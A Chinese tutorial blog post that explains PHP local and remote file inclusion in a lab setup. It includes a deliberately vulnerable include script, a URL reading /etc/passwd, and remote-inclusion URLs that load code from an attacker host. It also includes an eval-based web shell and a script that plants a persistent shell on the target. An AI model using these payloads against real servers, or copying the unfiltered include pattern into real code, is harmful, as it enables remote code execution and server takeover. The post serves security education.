文件包含漏洞(1),文件包含漏洞的利用原理

文件包含漏洞利用的原理

一, 本地文件包含

1. 漏洞利用条件:

在默认情况下, php.ini配置文件中 allow_url_fopen=On 是开启状态.

服务器php脚本中的 include include_once require require_once 等函数用于包含文件中的代码, 如果参数是用户可控的, 则可能被利用来执行系统命令或执行恶意代码. 例如:

http://192.168.112.200/security/fileinc.php

php 复制代码
<?php
$filename = $_GET['filename'];
include $filename;    // 或include_once, require, require_once
echo "<hr>欢迎来到PHP的世界.<br>";
?>

这里GET方法的 filename 参数用户可控, 且没有对包含的文件进行过滤和限制.

2. 利用方式
py 复制代码
读取系统文件
http://192.168.112.200/security/fileinc.php?filename=/etc/passwd
渲染html页面
http://192.168.112.200/security/fileinc.php?filename=login.html

二, 远程文件包含

1. 漏洞利用条件:

在默认情况下, php.ini配置文件中 allow_url_include=Off 是关闭状态.

如果该项配置被打开, 且include参数是用户可控的, 则可能被用于执行攻击者服务器上的恶意代码.

2. 利用方式:

假设 192.168.112.201 是攻击者的服务器

2.1 直接执行远程php代码
py 复制代码
http://192.168.112.200/security/fileinc.php?filename=http://192.168.112.201/security/test/mm.php
2.2 包含远程木马代码, 提交参数执行命令

木马文件: http://192.168.112.201/security/test/mm2.txt:

php 复制代码
<?php @eval($_GET['cmd']); ?>

注意包含恶意代码的文件后缀名是txt, 而不是php.

因为我们需要的是把mm2.txt文件中代码包含到目标fileinc.php当中去执行, 而不是在192.168.112.201上面直接执行php脚本.

包含远程脚本代码, 提交参数执行命令

py 复制代码
http://192.168.112.200/security/fileinc.php?
filename=http://192.168.112.201/security/test/mm2.txt&cmd=phpinfo();

http://192.168.112.200/security/fileinc.php?
filename=http://192.168.112.200/security/test/mm2.txt&cmd=system("ifconfig");

此时 &cmd=phpinfo(); 这里是提交的参数, 目标服务器经过包含mm2.txt文件内的代码之后, 即可执行参数中的命令.

2.3 通过远程php脚本将恶意代码写入到目标服务器.

木马文件: http://192.168.112.201/security/test/mm3.php:

php 复制代码
<?php 
$code = '<?php @eval($_GET["cmd"]); ?>';
file_put_contents("test/mm3_in.php", $code);
?>

以上代码在目标服务器test/目录下创建一个mm3_in.php木马文件.

利用文件包含漏洞执行代码:

py 复制代码
http://192.168.112.200/security/fileinc.php?filename=http://192.168.112.200/security/test/mm3.txt

执行成功后, 即可利用mm3_in.php:

py 复制代码
http://192.168.112.200/security/test/mm3_in.php?cmd=phpinfo();
相关推荐
世界尽头与你9 小时前
CVE-2025-14847_ MongoDB 未授权内存泄露漏洞
数据库·安全·mongodb·网络安全·渗透测试
世界尽头与你1 天前
CVE-2025-48976_ Apache Commons FileUpload 安全漏洞
网络安全·渗透测试·apache
世界尽头与你1 天前
CVE-2007-6750_ Apache HTTP Server 资源管理错误漏洞
安全·网络安全·渗透测试·apache
独行soc2 天前
2026年渗透测试面试题总结-3(题目+回答)
网络·python·安全·web安全·渗透测试
\xin2 天前
从信息收集到权限提升完整全流程思路渗透过程
渗透测试·信息收集·思路·权限提升·全过程
\xin2 天前
渗透测试全过程实例与思路
渗透测试·漏洞利用·反弹shell·漏洞扫描·后门·渗透思路
小六花s3 天前
渗透测试前四天PHP文件包含笔记
android·学习·渗透测试
Bruce_Liuxiaowei4 天前
基于HTA的Meterpreter反向Shell攻击实验
网络·windows·经验分享·网络安全·渗透测试
鴆川傲4 天前
渗透高级课四天学习总结
学习·渗透测试
独行soc5 天前
2026年渗透测试面试题总结-1(题目+回答)
android·开发语言·网络·安全·web安全·渗透测试·php